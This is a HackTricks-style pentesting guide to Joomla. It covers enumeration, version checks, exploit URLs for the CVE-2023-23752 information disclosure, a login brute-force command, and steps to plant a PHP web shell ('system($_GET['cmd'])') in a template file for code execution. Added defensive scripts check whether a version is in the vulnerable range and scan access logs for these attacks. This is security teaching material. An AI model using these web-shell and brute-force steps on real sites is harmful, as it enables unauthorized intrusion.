# Joomla

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/files/Xcgr3q6BP5MpWT3hTn6d" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/files/Xcgr3q6BP5MpWT3hTn6d" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/files/aQnEyHWQGyok3qCc92qt" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/files/aQnEyHWQGyok3qCc92qt" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### Joomla Statistics

Joomla collects some anonymous [usage statistics](https://developer.joomla.org/about/stats.html) such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public [API](https://developer.joomla.org/about/stats/api.html).

```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}
```

## Enumeration

### Discovery/Footprinting

* Check the **meta**

```bash
curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
```

* robots.txt

```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```

* README.txt

```
1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```

### Version

* In **/administrator/manifests/files/joomla.xml** you can see the version.
* In **/language/en-GB/en-GB.xml** you can get the version of Joomla.
* In **plugins/system/cache/cache.xml** you can see an approximate version.

### Automatic

```bash
droopescan scan joomla --url http://joomla-site.local/
```

In [**80,443 - Pentesting Web Methodology**](/hacktricks/network-services-pentesting/pentesting-web.md#cms-scanners) there is a section about CMS scanners that can scan Joomla.

### API Unauthenticated Information Disclosure

Versions from 4.0.0 to 4.2.7 are vulnerable to an unauthenticated information disclosure (CVE-2023-23752) that dumps credentials and other information.

* Users: `http://<host>/api/v1/users?public=true`
* Config File: `http://<host>/api/index.php/v1/config/application?public=true`

**MSF Module**: `scanner/http/joomla_api_improper_access_checks` or ruby script: [51334](https://www.exploit-db.com/exploits/51334)
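To decide whether an installation you administer falls in that range, the version can be read from the file manifest listed in the Version section and compared against 4.0.0 to 4.2.7. This is an added example, not code from the original page; the sample manifest and host names are constructed, and the function names are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# Affected range as stated on this page: 4.0.0 through 4.2.7, inclusive
AFFECTED_MIN = (4, 0, 0)
AFFECTED_MAX = (4, 2, 7)

# Constructed, trimmed sample of /administrator/manifests/files/joomla.xml
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
  <name>files_joomla</name>
  <version>4.2.6</version>
  <creationDate>2022-12</creationDate>
</extension>"""


def manifest_version(xml_text):
    """Return the <version> text of a Joomla file manifest, or None."""
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError:
        return None  # truncated or non-XML response
    node = root.find("version")
    return node.text.strip() if node is not None and node.text else None


def version_tuple(version):
    """'4.2.7-rc1' -> (4, 2, 7); missing components count as 0."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part or 0) for part in m.groups())


def is_affected(version):
    """True when the version lies in the CVE-2023-23752 range given above."""
    return AFFECTED_MIN <= version_tuple(version) <= AFFECTED_MAX


def audit(manifests):
    """Map {host: manifest_xml} to a sorted list of (host, version) in range."""
    found = []
    for host, xml_text in manifests.items():
        version = manifest_version(xml_text)
        if version and is_affected(version):
            found.append((host, version))
    return sorted(found)


if __name__ == "__main__":
    # Constructed inventory: one host in range, one on a later release
    later = SAMPLE_MANIFEST.replace("4.2.6", "4.2.8")
    print(audit({"cms-a.example": SAMPLE_MANIFEST, "cms-b.example": later}))
```

Pre-release suffixes are ignored, so `4.2.7-rc1` is treated as 4.2.7 and reported as in range.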

### Brute-Force

You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login.

```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin
```

## RCE

If you have obtained **admin credentials**, you can gain **RCE** by adding a snippet of **PHP code** to a template file. We can do this by **customizing** a **template**.

1. **Click** on **`Templates`** on the bottom left under `Configuration` to pull up the templates menu.
2. **Click** on a **template** name. Let's choose **`protostar`** under the `Template` column header. This will bring us to the **`Templates: Customise`** page.
3. Finally, you can click on a page to pull up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows:
   1. **`system($_GET['cmd']);`**
4. **Save & Close**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
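Both the `?public=true` API requests from the information disclosure section and the `error.php?cmd=` request above leave recognisable entries in the web server access log. The following triage script is an added example, not part of the original page; it assumes Combined Log Format, and the sample lines and finding labels are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Joomla Web Services API route, with or without index.php in the path
API_RE = re.compile(r"^/api/(?:index\.php/)?v1/")
# A PHP file inside a template directory, requested directly
TEMPLATE_PHP_RE = re.compile(r"^/templates/[^/]+/.+\.php$")


def classify(line):
    """Return (client_ip, finding) for a request worth triaging, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    if API_RE.match(url.path) and "true" in params.get("public", []):
        # A 200 means the API answered this request; anything else is a probe.
        return ip, "api-public-answered" if status == "200" else "api-public-probe"
    if TEMPLATE_PHP_RE.match(url.path) and params:
        # Direct hit on a template PHP file with parameters (error.php?cmd=...)
        return ip, "template-php-with-query"
    return None


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2023:10:01:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1987 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Mar/2023:10:01:05 +0000] "GET /api/v1/users?public=true HTTP/1.1" 404 312 "-" "curl/7.88"',
    '203.0.113.9 - - [10/Mar/2023:10:07:41 +0000] "GET /templates/protostar/error.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.88"',
    '192.0.2.15 - - [10/Mar/2023:10:08:00 +0000] "GET /templates/protostar/css/template.css?v=3 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [10/Mar/2023:10:08:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 15320 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

A `template-php-with-query` finding is a reason to diff the template files on disk against a clean copy of the same Joomla release.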

## From XSS to RCE

* [**JoomSploit**](https://github.com/nowak0x01/JoomSploit): Joomla exploitation script that **elevates XSS to RCE or other critical vulnerabilities**. For more info check [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). It **supports Joomla versions 5.X.X, 4.X.X, and 3.X.X, and allows:**
  * ***Privilege Escalation:*** Creates a user in Joomla.
  * ***(RCE) Built-In Templates Edit:*** Edits a built-in template in Joomla.
  * ***(Custom) Custom Exploits:*** Custom exploits for third-party Joomla plugins.
